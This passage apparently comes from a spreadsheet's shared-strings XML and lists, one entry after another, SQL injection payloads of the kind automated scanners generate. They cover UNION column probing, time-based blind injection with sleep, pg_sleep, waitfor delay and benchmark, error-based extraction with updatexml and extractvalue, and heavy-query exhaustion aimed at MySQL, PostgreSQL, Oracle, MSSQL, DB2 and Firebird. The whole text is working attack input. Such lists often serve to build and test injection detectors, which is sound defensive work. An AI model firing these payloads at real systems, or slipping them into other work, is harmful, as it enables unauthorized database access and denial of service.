    <t xml:space="preserve"> end and   (  (   ( "zpii" like "zpii</t>
  </si>
  <si>
    <t>1'  )  )   order by 1#</t>
  </si>
  <si>
    <t>1' )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'gcna' = 'gcna</t>
  </si>
  <si>
    <t>1'  )  )   as prxm where 1267 = 1267 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1' in boolean mode )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t>1"  )  )   )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1'  )  )   as iuta where 1482 = 1482</t>
  </si>
  <si>
    <t>1  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  4348 = 4348</t>
  </si>
  <si>
    <t>1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'adsh' = 'adsh</t>
  </si>
  <si>
    <t>-3084%'  )  )   order by 1--</t>
  </si>
  <si>
    <t>1'+ ( select oqvo where 7448 = 7448 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>-4045 union all select 6857,6857,6857,6857,6857,6857,6857--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "wvlb" like "wvlb</t>
  </si>
  <si>
    <t>1" )  as zovk where 4591 = 4591 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'ozef' = 'ozef</t>
  </si>
  <si>
    <t>-6423' )  or 6872 = 6872</t>
  </si>
  <si>
    <t xml:space="preserve">-7175' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1" or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "ncym" like "ncym</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-4236 )  union all select 5260,5260,5260,5260,5260,5260,5260,5260,5260#</t>
  </si>
  <si>
    <t>1%'  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1  )  )   as amyr where 7875 = 7875 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) #</t>
  </si>
  <si>
    <t>-9353" where 4607 = 4607 union all select 4607,4607,4607,4607,4607,4607#</t>
  </si>
  <si>
    <t>1  )  )   as uizx where 2512 = 2512 and make_set ( 1402 = 2908,2908 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   waitfor delay '0:0:5' and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'+ ( select llcl where 8188 = 8188 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-4838'  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1'+ ( select 'ymgm' where 8204 = 8204 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 'dsok' = 'dsok</t>
  </si>
  <si>
    <t>-7601"  )  )   )  union all select 1293,1293,1293,1293,1293,1293,1293,1293--</t>
  </si>
  <si>
    <t>-4248 where 3288 = 3288 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and 'nhmz' like 'nhmz</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( "innk" = "innk</t>
  </si>
  <si>
    <t>1" where 2452 = 2452</t>
  </si>
  <si>
    <t>1%" )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 1729 = 1729</t>
  </si>
  <si>
    <t>1'+ ( select 'mxlb' where 4900 = 4900</t>
  </si>
  <si>
    <t>1 )  as cejp where 4736 = 4736 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-9725 )  where 9068 = 9068 or elt ( 4723 = 1426,1426 ) --</t>
  </si>
  <si>
    <t>-6122'  )  )   )  or 9243 = 6161--</t>
  </si>
  <si>
    <t>-8043%"  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-8772%' union all select 4909,4909,4909,4909,4909,4909,4909,4909,4909#</t>
  </si>
  <si>
    <t>1'|| ( select 'kuxp' where 7123 = 7123 and 1688 = 4200#</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( 'tpeo' like 'tpeo</t>
  </si>
  <si>
    <t>-1076 union all select 3959,3959--</t>
  </si>
  <si>
    <t>1' )  as rqfq where 7077 = 7077 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1" where 7380 = 7380 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'aezm' like 'aezm</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )  -- sztf</t>
  </si>
  <si>
    <t>-2071 union all select 4753,4753--</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and "vzft" = "vzft</t>
  </si>
  <si>
    <t>-6218'  )  )   or 2236 = 4469#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  3127 = 3127</t>
  </si>
  <si>
    <t xml:space="preserve">-2570" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) </t>
  </si>
  <si>
    <t>-3462  )  )   as biyl where 5143 = 5143 union all select 5143,5143,5143--</t>
  </si>
  <si>
    <t>-8929%' )  union all select 9486,9486,9486,9486#</t>
  </si>
  <si>
    <t>-4057' )  order by 1#</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t>1" and 5205 = 9975#</t>
  </si>
  <si>
    <t>1 where 1992 = 1992 union all select null,null--</t>
  </si>
  <si>
    <t>-1390%"  )  )   union all select 8930,8930,8930,8930,8930#</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 1902 = 5536 )  then 1 else 1902* ( select 1902 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'teng' like 'teng</t>
  </si>
  <si>
    <t>-1802' or 7931 = 5841--</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( "wucy" like "wucy</t>
  </si>
  <si>
    <t>-6298' or 4724 = 4876</t>
  </si>
  <si>
    <t>1" )  as ssbz where 8885 = 8885 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   as egsj where 3447 = 3447</t>
  </si>
  <si>
    <t>-5217'|| ( select 'juen' from dual where 7336 = 7336 union all select 7336,7336,7336--</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) </t>
  </si>
  <si>
    <t>1'+ ( select eluw where 6210 = 6210</t>
  </si>
  <si>
    <t xml:space="preserve">1" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">-8057'  )  )   as gpue where 4205 = 4205 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) </t>
  </si>
  <si>
    <t>1'  )  )   as mdtm where 1393 = 1393 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 4666 = 4666 )  then 1 else 4666* ( select 4666 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-3460%"  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>-7122" )  union all select 4002,4002,4002,4002,4002,4002,4002,4002#</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike sleep ( 5 )  and   (  (   ( 'rozr' like 'rozr</t>
  </si>
  <si>
    <t>1%' )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-4669 )  or 2452 = 1601#</t>
  </si>
  <si>
    <t>-1597" union all select 6038,6038,6038,6038,6038,6038,6038,6038,6038,6038--</t>
  </si>
  <si>
    <t>-9140"  )  )   union all select 1623,1623,1623,1623,1623,1623,1623,1623,1623#</t>
  </si>
  <si>
    <t>select  ( case when  ( 1123 = 9550 )  then 1123 else 1123* ( select 1123 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 2140 = 5325 )  then 2140 else 2140* ( select 2140 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t xml:space="preserve">-2648' )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 </t>
  </si>
  <si>
    <t>-9668'  )  )   as orfu where 5822 = 5822 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 1</t>
  </si>
  <si>
    <t>1%'  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   as ajwe where 1153 = 1153 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1' )  where 2928 = 2928</t>
  </si>
  <si>
    <t>-3546%" or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and "%" = "</t>
  </si>
  <si>
    <t>-7860'  )  )   )  union all select 7420,7420,7420,7420,7420,7420,7420,7420,7420,7420--</t>
  </si>
  <si>
    <t>1' )  where 9159 = 9159</t>
  </si>
  <si>
    <t>-5706"  )  )   union all select 2013,2013,2013,2013#</t>
  </si>
  <si>
    <t>-8810' )  or make_set ( 9354 = 9354,7185 )  and  ( 'prsn' like 'prsn</t>
  </si>
  <si>
    <t>1'  )  )   )  and 5615 = 5458--</t>
  </si>
  <si>
    <t>select case when 3920 = 4402 then 1 else null end--</t>
  </si>
  <si>
    <t>1' order by 1--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) #</t>
  </si>
  <si>
    <t>1 )  where 8375 = 8375</t>
  </si>
  <si>
    <t>-2707'  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( 'mwdq' = 'mwdq</t>
  </si>
  <si>
    <t>1 )  as xylu where 3338 = 3338 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1"  )  )   waitfor delay '0:0:5' and   (  (  "witb" = "witb</t>
  </si>
  <si>
    <t>1" )  where 6632 = 6632 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>-4191 )  order by 1#</t>
  </si>
  <si>
    <t>1" or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and "kojr" = "kojr</t>
  </si>
  <si>
    <t>-6084"  )  )   union all select 7354,7354,7354,7354,7354,7354,7354,7354#</t>
  </si>
  <si>
    <t>1" )  as crek where 6570 = 6570 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">-5411%"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char </t>
  </si>
  <si>
    <t>1" )  as yecj where 1194 = 1194 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( 1685 = 2985 ) *2985 and   (  (   ( 'rzwb' = 'rzwb</t>
  </si>
  <si>
    <t>1'|| ( select 'ggfx' where 4932 = 4932 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5  )  )  ||'</t>
  </si>
  <si>
    <t>1' )  where 1212 = 1212</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( 'lajk' = 'lajk</t>
  </si>
  <si>
    <t>1' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'thce' = 'thce</t>
  </si>
  <si>
    <t>1' or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'eomt' = 'eomt</t>
  </si>
  <si>
    <t>1 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  -- dkwz</t>
  </si>
  <si>
    <t>-9690 union all select 7217#</t>
  </si>
  <si>
    <t>1'+ ( select 'sbji' where 7989 = 7989 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo  )  )  +'</t>
  </si>
  <si>
    <t>1' )  as kgnd where 1550 = 1550 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   as cimd where 9608 = 9608</t>
  </si>
  <si>
    <t>1  )  )   )  and 6358 = 6735</t>
  </si>
  <si>
    <t>1" )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( "rfpq" = "rfpq</t>
  </si>
  <si>
    <t>-6359"  )  )   or elt ( 3546 = 2433,2433 )  and   (  (  "qxat" = "qxat</t>
  </si>
  <si>
    <t>-2787' union all select 3622,3622,3622,3622,3622,3622,3622,3622,3622,3622#</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-8266%' )  union all select 8626,8626,8626,8626,8626,8626--</t>
  </si>
  <si>
    <t>1%" )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select 'yjpp' where 8966 = 8966</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) </t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( 'wvzw' = 'wvzw</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%' )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1"  )  )   as uzvu where 2458 = 2458 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1%"  )  )   or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 'gegg' = 'gegg</t>
  </si>
  <si>
    <t xml:space="preserve">1,iif ( 1440 = 4612,1,1/0 ) </t>
  </si>
  <si>
    <t>-3956' )  or  ( 8459 = 8459 ) *4906 and  ( 'rflo' like 'rflo</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 3902 = 3902 )  then  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  else 1/ ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>1"  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  "wdye" like "wdye</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "twpn" like "twpn</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and 'gajm' = 'gajm</t>
  </si>
  <si>
    <t>-3756' )  union all select 1034,1034,1034--</t>
  </si>
  <si>
    <t>-7235" )  union all select 4624,4624,4624,4624,4624,4624,4624,4624,4624,4624#</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 2006 = 2006</t>
  </si>
  <si>
    <t>1'+ ( select luwn where 1214 = 1214 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and 'dfwj' = 'dfwj</t>
  </si>
  <si>
    <t>1 )  where 6494 = 6494</t>
  </si>
  <si>
    <t>1" )  as jtou where 8129 = 8129 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1  )  )   as khvx where 7533 = 7533 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'|| ( select 'iocs' where 9287 = 9287 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) ||'</t>
  </si>
  <si>
    <t>-7501'+ ( select uloc where 3089 = 3089 union all select 3089,3089,3089,3089,3089,3089,3089,3089,3089,3089--</t>
  </si>
  <si>
    <t>-9978" or make_set ( 4893 = 9765,9765 )  and "mhjt" = "mhjt</t>
  </si>
  <si>
    <t>1' or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'ynpr' = 'ynpr</t>
  </si>
  <si>
    <t xml:space="preserve">-5417 or elt ( 1032 = 1032,3623 ) </t>
  </si>
  <si>
    <t>1' )  where 4298 = 4298</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  as mqxb where 6496 = 6496 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1'  )  )   as uuuk where 7234 = 7234 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>-1949"  )  )   as urke where 8761 = 8761 union all select 8761,8761,8761,8761,8761,8761,8761#</t>
  </si>
  <si>
    <t>-8465' where 5242 = 5242 or 3806 = 7423--</t>
  </si>
  <si>
    <t>select case when 8227 = 1229 then 1 else null end--</t>
  </si>
  <si>
    <t>1" where 9014 = 9014 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 'snoa' = 'snoa</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 8596 = 8596 )  then 1 else 8596* ( select 8596 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>-4091  )  )   as lqqy where 3030 = 3030 union all select 3030,3030,3030#</t>
  </si>
  <si>
    <t>1'  )  )   as ytfi where 3323 = 3323 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( 'sqnk' = 'sqnk</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 ) -- hlgt</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4--</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3</t>
  </si>
  <si>
    <t>-2912'  )  )   order by 1--</t>
  </si>
  <si>
    <t>1 )  where 6788 = 6788 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' where 2389 = 2389 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>1%" and elt ( 4249 = 4249,7259 )  and "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">-3026 )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr </t>
  </si>
  <si>
    <t>1' in boolean mode )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1 where 2823 = 2823 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-5572" )  union all select 8131,8131#</t>
  </si>
  <si>
    <t xml:space="preserve">1"  )  )  </t>
  </si>
  <si>
    <t>1" )  where 1666 = 1666 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1 )  waitfor delay '0:0:5' and  ( 2993 = 2993</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  'srfc' like 'srfc</t>
  </si>
  <si>
    <t>1" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and "eiuc" like "eiuc</t>
  </si>
  <si>
    <t>-3884" where 8012 = 8012 union all select 8012,8012#</t>
  </si>
  <si>
    <t xml:space="preserve">1" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) </t>
  </si>
  <si>
    <t>1'  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( 'bvdw' = 'bvdw</t>
  </si>
  <si>
    <t>-7738%" )  union all select 8754,8754,8754,8754,8754,8754,8754,8754,8754#</t>
  </si>
  <si>
    <t>1' )  as twny where 9580 = 9580</t>
  </si>
  <si>
    <t>1"  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( "hxgu" = "hxgu</t>
  </si>
  <si>
    <t>1'  )  )   as lmsl where 3753 = 3753 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3#</t>
  </si>
  <si>
    <t>1 )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( 6786 = 6786</t>
  </si>
  <si>
